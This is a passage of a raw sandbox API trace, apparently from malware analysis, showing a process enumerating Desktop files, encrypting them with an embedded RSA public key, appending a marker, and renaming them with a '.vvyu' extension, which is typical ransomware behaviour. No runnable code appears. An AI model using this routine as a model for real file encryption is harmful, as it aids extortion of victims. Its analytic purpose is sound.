hHeap=0x620000) returned 1 [0192.717] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x1292f, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x1292f, lpOverlapped=0x0) returned 1 [0192.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0192.718] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x12934, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.718] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0192.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0192.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0192.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2e9ea68 [0192.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2e9ea68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2e9ee98 [0192.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0192.724] WriteFile (in: hFile=0x568, lpBuffer=0x2e9ee98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e9ee98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0192.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ee98 | out: hHeap=0x620000) returned 1 [0192.725] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.725] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0192.725] CloseHandle (hObject=0x568) returned 1 [0192.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0192.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2e9ea68 [0192.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0192.729] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\nQrFKLA.gif" (normalized: "c:\\users\\keecfmwgj\\desktop\\nqrfkla.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\nQrFKLA.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\nqrfkla.gif.vvyu")) returned 1 [0192.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.731] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0192.734] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa28c14c0, ftCreationTime.dwHighDateTime=0x1d899fb, ftLastAccessTime.dwLowDateTime=0x6248b450, ftLastAccessTime.dwHighDateTime=0x1d8a28d, ftLastWriteTime.dwLowDateTime=0x6248b450, ftLastWriteTime.dwHighDateTime=0x1d8a28d, nFileSizeHigh=0x0, nFileSizeLow=0xc188, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NWy04.bmp", cAlternateFileName="")) returned 1 [0192.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95410 [0192.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5e) returned 0x2cb4658 [0192.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95410 | out: hHeap=0x620000) returned 1 [0192.734] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\NWy04.bmp") returned=".bmp" [0192.734] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\NWy04.bmp" (normalized: "c:\\users\\keecfmwgj\\desktop\\nwy04.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0192.735] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=49544) returned 1 [0192.735] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0192.738] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xc162, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.738] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0192.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.740] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.740] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xc188, lpOverlapped=0x0) returned 1 [0192.741] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0192.741] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.742] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.742] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0192.743] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0192.743] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.743] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0192.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0192.743] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0192.743] GetLastError () returned 0x0 [0192.743] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0192.743] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0192.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.743] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0192.744] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0192.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.744] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0192.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc190) returned 0x2ea79b0 [0192.744] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0192.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0192.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0192.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95410 [0192.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93648 [0192.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95458 [0192.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93660 [0192.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93690 [0192.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936f0 [0192.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936a8 [0192.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0192.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0192.745] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0192.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2e9ea68 [0192.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93690 | out: hHeap=0x620000) returned 1 [0192.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936a8 | out: hHeap=0x620000) returned 1 [0192.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936f0 | out: hHeap=0x620000) returned 1 [0192.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0192.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936f0 [0192.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0192.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c936a8 [0192.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0192.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c93690 [0192.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0192.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0192.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0192.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0192.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0192.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0192.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0192.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0192.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0192.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936a8 | out: hHeap=0x620000) returned 1 [0192.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93690 | out: hHeap=0x620000) returned 1 [0192.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0192.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936f0 | out: hHeap=0x620000) returned 1 [0192.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0192.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0192.747] GetCurrentThreadId () returned 0x66c [0192.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0192.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x64e800 [0192.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0192.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0192.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0192.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0192.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0192.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0192.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.748] GetCurrentThreadId () returned 0x66c [0192.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0192.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0192.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0192.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa28 [0192.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0192.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0192.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0192.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936f0 [0192.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0192.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0192.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0192.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0192.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0192.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0192.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0192.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93690 [0192.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0192.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0192.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0192.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0192.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0192.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c936a8 [0192.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0192.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0192.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0192.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93678 [0192.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0192.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93708 [0192.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0192.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936d8 [0192.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936c0 [0192.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93720 [0192.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936c0 | out: hHeap=0x620000) returned 1 [0192.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c936c0 [0192.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936d8 | out: hHeap=0x620000) returned 1 [0192.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0192.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0192.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0192.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93690 | out: hHeap=0x620000) returned 1 [0192.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93690 [0192.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2e9ea68 [0192.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936f0 | out: hHeap=0x620000) returned 1 [0192.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0192.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93720 | out: hHeap=0x620000) returned 1 [0192.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2e9ec78 [0192.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0192.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0192.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93690 | out: hHeap=0x620000) returned 1 [0192.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2e9ee90 [0192.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0192.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0192.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0192.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0192.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0192.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0192.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0192.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ec78 | out: hHeap=0x620000) returned 1 [0192.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ee90 | out: hHeap=0x620000) returned 1 [0192.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0192.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936c0 | out: hHeap=0x620000) returned 1 [0192.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93708 | out: hHeap=0x620000) returned 1 [0192.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0192.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936a8 | out: hHeap=0x620000) returned 1 [0192.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93678 | out: hHeap=0x620000) returned 1 [0192.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0192.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0192.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0192.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93660 | out: hHeap=0x620000) returned 1 [0192.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95458 | out: hHeap=0x620000) returned 1 [0192.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 